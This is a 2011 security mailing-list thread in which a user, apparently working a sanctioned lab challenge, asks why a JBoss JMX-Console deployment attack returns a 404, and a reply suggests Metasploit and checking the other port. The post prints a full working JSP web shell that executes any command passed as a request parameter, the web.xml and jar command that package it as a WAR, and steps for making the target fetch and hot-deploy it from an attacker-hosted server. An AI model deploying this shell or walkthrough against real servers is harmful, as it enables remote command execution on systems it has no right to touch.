Re: breaking jboss with a browser? not happening



On 14 January 2011 20:02, lazers <a.alii85@xxxxxxxxx> wrote:

I have been given task to break into jboss application by my senior sec
manager at my company.
Its a hacking challenge staged in a test lab This is what i have been given.
A web-access to jboss.
Yes that pretty much it<3. He believes in less is more philosophy. With some
get to start working info. I have been told that a vulnerability exists
inthe application and its no 0 day exploit its an known vulnerability.It is
set as an open-book challenge i can get help anywhere i like. So what i did
so for?


Yes i google ; but i also run a nessus scan and the scan brought me one HIGH
vulnerability. Its has to do with the default Jboss installation using the
JMX-Console. Its not a new vulnerability i was able to reach this conclusion
as i start googling. This particular vulnerability is very popular; I was
saying to myself that my problems are over and i would be break it into
jboss in record time. But that has been largely un-true. Why? Well if it
wasn't true i wouldn't be  here. I did the following (in steps)


attack vector: deployment scanner feature





1.confirmed the default installation (by accessing localhost:9090) in my
case its

9090 not 8080 as in hacking literature. Probably this is because em using a
new version (idk exact reason)



2.i wrote this jsp script(cmd.jsp) astold in sites.

<%@ page import="java.util.*,java.io.*"%>

<%

%>

<HTML><BODY>

Commands with JSP

<FORM METHOD="GET" NAME="myform"ACTION="">

<INPUT TYPE="text" NAME="cmd">

<INPUT TYPE="submit" VALUE="Send">

</FORM>

<pre>

<%

if (request.getParameter("cmd") != null) {

out.println("Command: " + request.getParameter("cmd") +"<BR>");

Process p =Runtime.getRuntime().exec(request.getParameter("cmd"));

OutputStream os = p.getOutputStream();

InputStream in = p.getInputStream();

DataInputStream dis = new DataInputStream(in);

String disr = dis.readLine();

while ( disr != null ) {

out.println(disr);

disr = dis.readLine();

}

}

%>

</pre>

</BODY></HTML>



3.next i create a web.xml file to be placed in WEB-INF folder



<?xml version="1.0" ?>

<web-app xmlns="http://java.sun.com/xml/ns/j2ee";

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";

xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee

http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd";

version="2.4">

<servlet>

<servlet-name>Command</servlet-name>

<jsp-file>/cmd.jsp</jsp-file>

</servlet>

</web-app>



4.I complied the file cmd.jsp by placing the web.xml file in WEB-INF folder



jar cvf cmd.war WEB-INF cmd.jsp



5. I put this file in http-apache server. File cmd.war reside at htdocs
folder. Can be accessed by url: mywebserver:80/cmd.war



6.i go back to jboss defualt page and navigate myself to
jboss.deploymentpage.



7. in the addurl tab i enter path for my cmd.war file as

http://mywebserver/cmd.war



8. next i goto victim webserver in attempt to access my uploaded application
http://victim:9090/cmd/cmd.jsp



9. i get HTTP STATUS 404- /cmd/cmd.jsp



my app is suppose to be hot deployed by the jboss; but this is not the case
coz even after 10-20 times after u have access the file i get the same error
page. I want to know what is the reason for the behavior. I know there
exists other attack vector (e.g rmi and etc) but i want to stick to this
until i don't figure out the reason for this failure of exploit.



Em i compiling the .jsp file with incorrect syntax? do i need to have tomcat
server installed instead? I read it on internet that there could be some
problems in the jboss trying to get reverse shell on your web-server as
jboss is it work in bind-shell mode only? I'm really clueless to what i
happening i spent 12 works on this single attack vector but em not making
head-ways.



jboss gurus help me.


Metasploit has a plugin that will do this automatically against JBoss
if you know the credentials.

I'd also check where the file is being deployed. I did this on a test
once and there were two open ports, I installed the app on one but
then got a 404 when browsing to it, when I accessed it through the
other port it worked fine.

Robin

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------



Relevant Pages

  • JBoss Websphere Admin
    ... JBoss Websphere Admin ... Installation and patches to the JVM 1.5 ... Extensions management Security Management of real server resource use ... this person must be able to install and configure Java ...
    (comp.lang.java.beans)
  • Re: Question about getting JBoss running
    ... In the installation guide it says that JBoss ... A web app is easy to build with some good IDE, I prefer NetBeans. ... Drop that WAR to the server/default/deploy folder in JBoss, ...
    (comp.lang.java.programmer)
  • breaking jboss with a browser? not happening
    ... Its a hacking challenge staged in a test lab This is what i have been given. ... A web-access to jboss. ... I have been told that a vulnerability exists ...
    (Pen-Test)
  • Re: /usr/local/java/jboss5 fails to build
    ... installation is done on a 8.2-RELEASE-p6 FreeBSD amd64 with openjdk6 ... problem is jboss has change to a new repository system and all old urls are changed...) ... JBOSS5 on FreeBSD, I can download jboss-5.1.0.GA.zip from here ...
    (freebsd-questions)
  • JBOSS 3.2.2-3.2.7 / 4.0.2 installation path disclosure / config disclosure / version fingerprinting
    ... disclosure / config disclosure / version fingerprinting ... The default installation of JBoss reveals the path of the installation ... the version of the JBoss server and with version 4.0.2 to download all ...
    (Bugtraq)